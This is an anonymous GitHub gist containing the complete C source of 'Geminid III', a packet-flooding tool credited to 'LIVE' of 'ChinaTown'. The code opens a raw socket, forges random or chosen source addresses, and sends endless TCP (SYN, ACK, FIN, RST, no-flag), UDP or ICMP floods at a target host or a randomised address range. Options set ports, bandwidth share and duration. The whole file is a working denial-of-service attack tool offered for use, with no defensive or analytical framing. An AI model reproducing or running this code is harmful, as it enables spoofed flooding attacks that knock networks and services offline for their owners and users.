Created
November 27, 2016 23:52
-
-
Save anonymous/a63b1b0cce827fc7f812aef8e1b82b0e to your computer and use it in GitHub Desktop.
klauss
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Geminid III. TCP/UDP/ICMP Packet flooder | |
* | |
* | |
* Usage: geminid [-T -U -I -N -s -h -d -p -q -l -t] | |
* | |
* -T TCP attack [0:ACK, 1:FIN, 2:RST, 3:SYN] (no default ) | |
* -U UDP attack (no options ) | |
* -I ICMP attack (no options ) | |
* -N Bogus No flag attack (no options ) | |
* -s source class/ip (defaults to random ) | |
* -h destination host/ip (no default ) | |
* -d destination class (no default ) | |
* -p destination port range [start,end] (defaults to random ) | |
* -q source port range [start,end] (defaults to random ) | |
* -l % of box link to use (defaults to 100% ) | |
* -t timeout (defaults to forever) | |
* | |
* | |
* Compiling | |
* | |
* Default: | |
* % gcc g3m.c -o g3m | |
* | |
* With password file option: | |
* % gcc -DF_PASS geminid.c -o geminid | |
* | |
* by LIVE | |
* GEM III - ChinaTown | |
*/ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <netdb.h> | |
#include <string.h> | |
#include <sys/types.h> | |
#include <sys/stat.h> | |
#include <sys/socket.h> | |
#include <fcntl.h> | |
#include <time.h> | |
#include <signal.h> | |
#ifdef F_PASS | |
#include <sys/stat.h> | |
#endif | |
#include <netinet/in_systm.h> | |
#include <sys/socket.h> | |
#include <string.h> | |
#include <time.h> | |
#ifndef __USE_BSD | |
# define __USE_BSD | |
#endif | |
#ifndef __FAVOR_BSD | |
# define __FAVOR_BSD | |
#endif | |
#include <netinet/in.h> | |
#include <netinet/ip.h> | |
#include <netinet/tcp.h> | |
#include <netinet/udp.h> | |
#include <netinet/ip_icmp.h> | |
#include <arpa/inet.h> | |
#ifdef LINUX | |
# define FIX(x) htons(x) | |
#else | |
# define FIX(x) (x) | |
#endif | |
/* Geminid attack flags */ | |
#define TCP_ACK 1 | |
#define TCP_FIN 2 | |
#define TCP_SYN 4 | |
#define TCP_RST 8 | |
#define UDP_CFF 16 | |
#define ICMP_ECHO_G 32 | |
#define TCP_NOF 64 /* -N */ | |
/* No flag attack */ | |
#define TH_NOF 0x0 | |
#define TCP_ATTACK() (a_flags & TCP_ACK ||\ | |
a_flags & TCP_FIN ||\ | |
a_flags & TCP_SYN ||\ | |
a_flags & TCP_RST ||\ | |
a_flags & TCP_NOF) | |
#define UDP_ATTACK() (a_flags & UDP_CFF) | |
#define ICMP_ATTACK() (a_flags & ICMP_ECHO_G) | |
#define CHOOSE_DST_PORT() dst_sp == 0 ?\ | |
random () :\ | |
htons(dst_sp + (random() % (dst_ep -dst_sp +1))); | |
#define CHOOSE_SRC_PORT() src_sp == 0 ?\ | |
random () :\ | |
htons(src_sp + (random() % (src_ep -src_sp +1))); | |
#define SEND_PACKET() if (sendto(rawsock,\ | |
&packet,\ | |
(sizeof packet),\ | |
0,\ | |
(struct sockaddr *)&target,\ | |
sizeof target) < 0) {\ | |
perror("sendto");\ | |
exit(-1);\ | |
} | |
/* Linux / SunOS x86 / FreeBSD */ | |
//#define BANNER_CKSUM 54018 | |
/* SunOS Sparc */ | |
#define BANNER_CKSUM 723 | |
u_long lookup(const char *host); | |
unsigned short in_cksum(unsigned short *addr, int len); | |
static void inject_iphdr(struct ip *ip, u_char p, u_char len); | |
char *class2ip(const char *class); | |
static void send_tcp(u_char th_flags); | |
static void send_udp(u_char garbage); | |
static void send_icmp(u_char garbage); | |
char *get_plain(const char *crypt_file, const char *xor_data_key); | |
static void usage(const char *argv0); | |
u_long dstaddr; | |
u_short dst_sp, dst_ep, src_sp, src_ep; | |
char *src_class, *dst_class; | |
/* u_char rseed[4096]; | |
int a_flags, rawsock, rsi; | |
*/ | |
int a_flags, rawsock; | |
struct sockaddr_in target; | |
/* Self promotion :) */ | |
const char *banner = "Geminid III. by ChinaTown [TCP/UDP/ICMP Packet flooder]"; | |
struct pseudo_hdr { /* See RFC 793 Pseudo Header */ | |
u_long saddr, daddr; /* source and dest address */ | |
u_char mbz, ptcl; /* zero and protocol */ | |
u_short tcpl; /* tcp length */ | |
}; | |
struct cksum { | |
struct pseudo_hdr pseudo; | |
struct tcphdr tcp; | |
}; | |
struct { | |
int gv; /* valor geminid */ | |
int kv; /* valor Kernel */ | |
void (*f)(u_char); | |
} a_list[] = { | |
/* TCP */ | |
{ TCP_ACK, TH_ACK, send_tcp }, | |
{ TCP_FIN, TH_FIN, send_tcp }, | |
{ TCP_SYN, TH_SYN, send_tcp }, | |
{ TCP_RST, TH_RST, send_tcp }, | |
{ TCP_NOF, TH_NOF, send_tcp }, /* No flag */ | |
/* UDP */ | |
{ UDP_CFF, 0, send_udp }, | |
/* ICMP */ | |
{ ICMP_ECHO_G, ICMP_ECHO, send_icmp }, | |
{ 0, 0, (void *)NULL }, | |
}; | |
int | |
main(int argc, char *argv[]) | |
{ | |
int n, i, on = 1; | |
int b_link; | |
#ifdef F_PASS | |
struct stat sb; | |
#endif | |
unsigned int until; | |
a_flags = dstaddr = i = 0; | |
dst_sp = dst_ep = src_sp = src_ep = 0; | |
until = b_link = -1; | |
src_class = dst_class = NULL; | |
while ( (n = getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) != -1) { | |
char *p; | |
switch (n) { | |
case 'T': /* TCP attack | |
* | |
* 0: ACK | |
* 1: FIN | |
* 2: RST | |
* 3: SYN | |
*/ | |
switch (atoi(optarg)) { | |
case 0: a_flags |= TCP_ACK; break; | |
case 1: a_flags |= TCP_FIN; break; | |
case 2: a_flags |= TCP_RST; break; | |
case 3: a_flags |= TCP_SYN; break; | |
} | |
break; | |
case 'U': /* UDP attack | |
*/ | |
a_flags |= UDP_CFF; | |
break; | |
case 'I': /* ICMP attack | |
*/ | |
a_flags |= ICMP_ECHO_G; | |
break; | |
case 'N': /* Bogus No flag attack (TCP) | |
*/ | |
a_flags |= TCP_NOF; | |
break; | |
case 's': | |
src_class = optarg; | |
break; | |
case 'h': | |
dstaddr = lookup(optarg); | |
break; | |
case 'd': | |
dst_class = optarg; | |
i = 1; /* neat flag to check command line later */ | |
break; | |
case 'p': | |
if ( (p = (char *) strchr(optarg, ',')) == NULL) | |
usage(argv[0]); | |
dst_sp = atoi(optarg); /* Destination start port */ | |
dst_ep = atoi(p +1); /* Destination end port */ | |
break; | |
case 'q': | |
if ( (p = (char *) strchr(optarg, ',')) == NULL) | |
usage(argv[0]); | |
src_sp = atoi(optarg); /* Source start port */ | |
src_ep = atoi(p +1); /* Source end port */ | |
break; | |
case 'l': | |
b_link = atoi(optarg); | |
if (b_link <= 0 || b_link > 100) | |
usage(argv[0]); | |
break; | |
case 't': | |
until = time(0) +atoi(optarg); | |
break; | |
default: | |
usage(argv[0]); | |
break; | |
} | |
} | |
/* Checking command line */ | |
if ( (!dstaddr && !i) || | |
(dstaddr && i) || | |
(!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) || | |
(src_sp != 0 && src_sp > src_ep) || | |
(dst_sp != 0 && dst_sp > dst_ep)) | |
usage(argv[0]); | |
srandom(time(NULL) ^ getpid()); | |
/* Opening RAW socket */ | |
if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { | |
perror("socket"); | |
exit(-1); | |
} | |
if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL, | |
(char *)&on, sizeof(on)) < 0) { | |
perror("setsockopt"); | |
exit(-1); | |
} | |
/* Filling target structure */ | |
target.sin_family = AF_INET; | |
/* Packeting! */ | |
for (n = 0; ; ) { | |
/* Poor link control handling */ | |
if (b_link != -1 && random() % 100 +1 > b_link) { | |
if (random() % 200 +1 > 199) | |
usleep(1); | |
continue; | |
} | |
/* Sending requested packets */ | |
for (i = 0; a_list[i].f != NULL; ++i) { | |
if (a_list[i].gv & a_flags) | |
a_list[i].f(a_list[i].kv); | |
} | |
/* Attack is finished? Do not check it every time, would eat | |
* too much CPU */ | |
if (n++ == 100) { | |
if (until != -1 && time(0) >= until) break; | |
n = 0; | |
} | |
} | |
exit(0); | |
} | |
u_long | |
lookup(const char *host) | |
{ | |
struct hostent *hp; | |
if ( (hp = gethostbyname(host)) == NULL) { | |
perror("gethostbyname"); | |
exit(-1); | |
} | |
return *(u_long *)hp->h_addr; | |
} | |
#define RANDOM() (int) random() % 255 +1 | |
char * | |
class2ip(const char *class) | |
{ | |
static char ip[16]; | |
int i, j; | |
for (i = 0, j = 0; class[i] != '\0'; ++i) | |
if (class[i] == '.') | |
++j; | |
switch (j) { | |
case 0: | |
sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM()); | |
break; | |
case 1: | |
sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM()); | |
break; | |
case 2: | |
sprintf(ip, "%s.%d", class, RANDOM()); | |
break; | |
/* Spoofing single host */ | |
default: strncpy(ip, class, 16); | |
break; | |
} | |
return ip; | |
} | |
unsigned short | |
in_cksum(unsigned short *addr, int len) | |
{ | |
int nleft = len; | |
int sum = 0; | |
unsigned short *w = addr; | |
unsigned short answer = 0; | |
/* | |
* Our algorithm is simple, using a 32 bit accumulator (sum), we add | |
* sequential 16 bit words to it, and at the end, fold back all the | |
* carry bits from the top 16 bits into the lower 16 bits. | |
*/ | |
while (nleft > 1) { | |
sum += *w++; | |
nleft -= 2; | |
} | |
/* | |
* Mop up an odd byte, if necessary | |
*/ | |
if (nleft == 1) { | |
*(unsigned char *) (&answer) = *(unsigned char *)w; | |
sum += answer; | |
} | |
/* | |
* Add back carry outs from top 16 bits to low 16 bits | |
*/ | |
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ | |
sum += (sum >> 16); | |
answer = ~sum; | |
return answer; | |
} | |
/* | |
* Creating generic ip header, not yet ready to be used. | |
*/ | |
static void | |
inject_iphdr(struct ip *ip, u_char p, u_char len) | |
{ | |
/* Filling IP header */ | |
ip->ip_hl = 5; | |
ip->ip_v = 4; | |
ip->ip_p = p; | |
ip->ip_tos = 0x0; /* 0x0 */ | |
ip->ip_id = random(); | |
ip->ip_len = 15; | |
ip->ip_off = 0; | |
ip->ip_ttl = 133; | |
ip->ip_dst.s_addr = dst_class != NULL ? | |
inet_addr(class2ip(dst_class)) : | |
dstaddr; | |
ip->ip_src.s_addr = src_class != NULL ? | |
inet_addr(class2ip(src_class)) : | |
random(); | |
/* I know, this is not part of the game, but anyway.. */ | |
target.sin_addr.s_addr = ip->ip_dst.s_addr; | |
} | |
static void | |
send_tcp(u_char th_flags) | |
{ | |
struct cksum cksum; | |
struct packet { | |
struct ip ip; | |
struct tcphdr tcp; | |
} packet; | |
/* Filling IP header */ | |
memset(&packet, 0, sizeof packet); | |
inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet)); | |
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); | |
/* Filling cksum pseudo header */ | |
cksum.pseudo.daddr = dstaddr; | |
cksum.pseudo.mbz = 0; | |
cksum.pseudo.ptcl = IPPROTO_TCP; | |
cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); | |
cksum.pseudo.saddr = packet.ip.ip_src.s_addr; | |
/* Filling TCP header */ | |
packet.tcp.th_flags = 0; | |
packet.tcp.th_win = htons(16384); | |
packet.tcp.th_seq = random(); | |
packet.tcp.th_ack = rand(); | |
packet.tcp.th_flags = th_flags; | |
packet.tcp.th_off = 5; | |
packet.tcp.th_urp = 0; | |
packet.tcp.th_sport = CHOOSE_SRC_PORT(); | |
packet.tcp.th_dport = CHOOSE_DST_PORT(); | |
cksum.tcp = packet.tcp; | |
packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); | |
SEND_PACKET(); | |
} | |
static void | |
send_udp(u_char garbage) /* No use for garbage here, just to remain */ | |
{ /* coherent with a_list[] */ | |
struct packet { | |
struct ip ip; | |
struct udphdr udp; | |
} packet; | |
/* Filling IP header */ | |
memset(&packet, 0, sizeof packet); | |
inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet)); | |
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); | |
/* Filling UDP header */ | |
packet.udp.uh_sport = CHOOSE_SRC_PORT(); | |
packet.udp.uh_dport = CHOOSE_DST_PORT(); | |
packet.udp.uh_ulen = htons(sizeof packet.udp); | |
packet.udp.uh_sum = random(); /* No checksum */ | |
SEND_PACKET(); | |
} | |
/* | |
realrand (int low, int high) | |
{ | |
int evil[2]; | |
evil[0] = rseed[rsi]; | |
evil[1] = rseed[rsi + 1]; | |
rsi += 2; | |
if (evil[0] == 0x00) | |
evil[0]++; | |
if (evil[1] == 0x00) | |
evil[1]++; | |
srandom (time (0)); | |
srand (random () << pid % evil[0] >> evil[1]); | |
return ((rand () % (int) (((high) + 1) - (low))) + (low)); | |
} | |
int tiposicmp[14] = | |
{ | |
0, 1, 2, 4, 6, 8, 12, 17, 22, 41, 58, 255, 0, | |
}; | |
*/ | |
static void | |
send_icmp(u_char gargabe) /* Garbage discarded again.. */ | |
{ | |
struct packet { | |
struct ip ip; | |
struct icmp icmp; | |
} packet; | |
/* tiposicmp[13] = rand (0, 255); */ | |
/* Filling IP header */ | |
memset(&packet, 0, sizeof packet); | |
inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet)); | |
packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); | |
/* Filling ICMP header */ | |
packet.icmp.icmp_type = ICMP_ECHO; | |
packet.icmp.icmp_code = 0; | |
packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8)); | |
SEND_PACKET(); | |
} | |
static void | |
usage(const char *argv0) | |
{ | |
printf("%s \n", banner); | |
printf("Usage: %s [-T -U -I -N -s -h -d -p -q -l -t]\n\n", argv0); | |
printf("REGISTERED TO: seilaqm..\n\n"); | |
printf(" -T TCP attack [0:ACK, 1:FIN, 2:RST, 3:SYN] (no default )\n"); | |
printf(" -U UDP attack (no options )\n"); | |
printf(" -I ICMP attack (no options )\n"); | |
printf(" -N Bogus No flag attack (no options )\n"); | |
printf(" -s source class/ip (defaults to random )\n"); | |
printf(" -h destination host/ip (no default )\n"); | |
printf(" -d destination class (no default )\n"); | |
printf(" -p destination port range [start,end] (defaults to random )\n"); | |
printf(" -q source port range [start,end] (defaults to random )\n"); | |
printf(" -l %% of box link to use (defaults to 100%% )\n"); | |
printf(" -t timeout (defaults to forever)\n"); | |
exit(-1); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment